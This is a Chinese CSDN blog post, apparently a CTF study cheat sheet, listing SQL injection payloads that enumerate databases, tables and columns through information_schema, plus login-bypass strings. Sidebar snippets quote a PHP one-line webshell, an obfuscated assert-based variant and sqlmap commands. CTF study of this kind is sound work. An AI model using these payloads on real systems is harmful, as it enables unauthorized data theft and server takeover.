CTF-Web中常用语句

已于 2022-04-16 11:00:35 修改
阅读量298 收藏 2
点赞数
文章标签: php
于 2022-04-16 10:58:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomatoff/article/details/124210147
版权

1、爆库、爆表、爆字段、爆值常用语句
爆库:

union select 1,2,3,database(); #

爆表:

union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); #

爆字段:

union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="表名"; #

爆值:

union select 1,2,3,字段 from 表名; #

2、万能公式
a’ or true #
username=admin’ or ‘1’=‘1&password=admin’ or ‘1’='1

MagnoZ
关注
专栏目录
ctf-web
weixin_43150428的博客
11-04 2847
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 761
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
ctf-web常用网页
qq_35033983的博客
12-04 615
urlencode&decode: http://web.chacuo.net/charseturlencode
ctf web常用小姿势点
Pz_mstr's Blog
10-12 930
0x00 HTTP Content-Type 文件扩展名 Content-Type .* application/octet-stream .doc application/msword .git image/gif .html text/html .xml text/xml .ico image/x-icon .jpe image/jp
CTFweb篇-一句话木马
weixin_44597701的博客
08-05 5788
什么是一句话木马 一句话木马就是将一段代码植入服务器,然后通过蚁剑就可以直接拿到webshell 最简单的一句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack,至于为什么,这需要祥看蚁剑的原理 为了防止D盾的阻拦,经常可以使用不同的混淆来绕开D盾 一句话木马的条件 (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 例题 先用御剑扫描一下 发现后台地址 然后进入输入root 密码空(至于为什
CTFSHOW SSTI入门
v2ish1yan的博客
09-02 638
ssti入门题
木马学习笔记 1【一句话木马篇】
Sp4rkW的博客
10-27 7173
注意注意:本博客仅供学习交流使用,不可用于任何违法行为,学信息安全,保卫我国信息安全,爱我国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理 1.最最最最基础一句话 eval($_POST["...
ctf-web--总结几点基础题的做题思路
Sanky0u的博客
08-14 2万+
做了三天web题了,因为刚入门,还是不要做得太快,先把前几天学到的好好总结一下,一部分是做的几道bugku上的web题,一部分是合天网安上面做的几道web题,这篇博客就先介绍第一部分。 1. 看源码可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2.
CTF-Web-XSS
beihai2013
02-03 787
XSS靶机 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> ## 若执行了alert,则执行以下语句 window.alert = function() { confirm("完成的不错!"); window.loc
CTF-WEB小技俩
giantbranch的专栏
09-02 1万+
CTF-WEB小技俩 实验来源:合天网安实验室 预备知识       HTTP协议,报文的组成部分等,请参考http://raytaylorlin.com/Tech/web/HTTP/HTTP-message/以及简单的js脚本编写能力。
BugkuCTF:过狗一句话web
s0il的博客
04-19 2533
题目描述: 上面的php进行格式化之后: <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_...
CTF线下攻防赛总结
Sp4rkW的博客
10-01 3万+
原文链接:http://rcoil.me/2017/06/CTF%E7%BA%BF%E4%B8%8B%E8%B5%9B%E6%80%BB%E7%BB%93/ 作者:Rcoll 总结的非常好,转载收藏,感谢表哥的分享~ 一张常规的CTF线下攻防思维导图 SSH登陆 两三个人进行分工,一个粗略的看下web,有登陆口的话,就需要修改密码,将情况反馈给队友,让登陆ssh的小伙伴进行密码的修改...
【bugkuctf】过狗一句话 writeup
lansefly1990的专栏
10-02 1282
过狗一句话 &lt;?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?&gt; 用assert执行任意代码  payload:http://120.24.86.145:...
[初级]sql注入之BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3941
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
CTF web总结
热门推荐
giantbranch的专栏
04-09 8万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
BUUCTF**web**总结合集(正在更新)
最新发布
m0_64169451的博客
05-04 1221
buuctfweb练习题做题总结
CTFSHOW-web入门-信息搜集,爆破,命令执行
Yb_140的博客
02-19 5000
目录 Web入门 信息搜集 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 爆破 web21 web22 web23 web24 web25 web26 web27 web28 命令执行 web29 web30 web31 web32 web33 web34 web35 web36
SQL注入之sqlmap爆破sqli-labs-master
龙乐的专栏
08-23 9935
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。 GET型的sqlmap爆破。 1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库数据表:python sqlmap.py -u http://loc
CTF| 简易留言板
qq_42646885的博客
07-08 3065
打开网址是个简易留言板,有两个输入框可以输入。 随便输入几个字符提交后,发先提交一条记录返回四个信息。这四个信息,姓名和内容是由输入内容决定的,其他两个时间和ID是不可控的,时间获取的是当前时间,可能是使用了SQL的now()函数,ID可能是从1自动增长的。 试下注入,输入一个单引号',提示留言失败。在昵称输入两个单引号,留言成功,昵称显示只有一个单引号。这个应该是Insert二次注...
揭秘CTF-Web-Challenges的四个Web挑战
从文件名称列表提到的“CTF-Web-Challenges-master”,可以推测这是一系列挑战的代码库或者工作目录的名称,使用了“master”这个词表明这可能是一个主版本或者主分支,存储了所有相关挑战的代码、说明和资源。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值